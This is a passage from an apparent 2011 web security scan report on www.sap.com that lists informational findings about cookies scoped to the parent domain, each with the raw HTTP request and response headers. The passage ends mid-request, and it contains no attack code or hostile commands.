Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:28:18 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:28:18 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:28:18 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:28:18 GMT
Content-Length: 47227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.42. http://www.sap.com/sme/seeitinaction/customerreferences.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/customerreferences.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/customerreferences.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76575
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.43. http://www.sap.com/sme/seeitinaction/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54470
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:13 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:13 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:03:13 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.44. http://www.sap.com/sme/seeitinaction/overviewvideos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/overviewvideos.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/overviewvideos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85841
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:19 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.45. http://www.sap.com/sme/seeitinaction/seealldemos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/seealldemos.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/seealldemos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86391
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.46. http://www.sap.com/sme/seeitinaction/solutiondemos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/solutiondemos.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/solutiondemos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 65712
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:21 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:21 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.47. http://www.sap.com/sme/solutions/businessmanagement/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/solutions/businessmanagement/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/solutions/businessmanagement/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:23:51 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:23:51 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:23:51 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:23:51 GMT
Content-Length: 53309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.48. http://www.sap.com/solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 57693
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:54 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:54 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:54 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.49. http://www.sap.com/solutions/products/sales-on-demand/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/products/sales-on-demand/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/products/sales-on-demand/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:56 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.50. http://www.sap.com/solutions/products/sap-bydesign/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/products/sap-bydesign/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/products/sap-bydesign/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24435
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:56 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.51. http://www.sap.com/solutions/rapid-deployment/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/rapid-deployment/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/rapid-deployment/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23462
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:52 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:52 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:52 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.52. http://www.sap.com/solutions/sap-crystal-solutions/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/sap-crystal-solutions/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/sap-crystal-solutions/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59464
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:56 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.53. http://www.sap.com/solutions/sme.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/sme.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/sme.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25281
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:51 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:51 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:51 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.54. http://www.sap.com/text/sme/search/SAP_nn6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /text/sme/search/SAP_nn6.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /text/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33792
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:44 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.55. http://www.sap.com/text/zzzzzz=yyyyy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /text/zzzzzz=yyyyy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /text/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33720
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.56. http://www.sap.com/zzzzzz=yyyyy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /zzzzzz=yyyyy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zzzzzz=yyyyy?_=1318688469563 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.sap.com/country-selector.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688530|session#1318688461599-607633#1318690330

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 32995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.57. https://www.sap.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /WebResource.axd

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebResource.axd HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html
Location: /errorpage.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:25 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/errorpage.epx">here</a>.</h2>
</body></html>
11.58. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/Tracking.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 439
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
